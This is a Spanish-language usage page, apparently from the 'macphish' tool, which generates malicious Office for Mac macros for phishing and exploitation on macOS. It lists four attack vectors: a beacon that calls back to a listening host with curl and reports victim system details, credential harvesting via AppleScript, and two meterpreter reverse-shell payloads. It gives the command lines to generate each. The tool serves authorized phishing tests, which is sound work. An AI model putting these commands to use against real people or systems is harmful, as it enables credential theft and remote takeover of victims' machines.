
Genera macros maliciosas de Office para Mac con baliza, recolección de credenciales y cargas útiles de meterpreter para pruebas de phishing y explotación en macOS.
Generador de Payloads de Macros para Office en Mac

Hay 4 vectores de ataque disponibles:
Para el método 'creds', macphish puede generar el script de Applescript directamente, en caso de que necesites ejecutarlo desde un shell.
Al ejecutarse, este payload señalará a nuestro host de escucha y proporcionará información básica del sistema sobre la víctima. La forma más sencilla de generar un payload beacon es:
$./macphish.py -lh <listening host>
Por defecto, usa curl pero otras utilidades (wget, nslookup) pueden usarse modificando la plantilla de comandos.
$./macphish.py -lh <listening host> -lp <listening port> -a creds
La forma más sencilla de generar un payload meterpreter es:
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter
Para generar un payload meterpreter que primero llame a GrantAccessToMultipleFiles():
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant
Para ataques meterpreter, solo se admiten payloads de Python por el momento.
See https://github.com/cldrn/macphish/wiki/Usage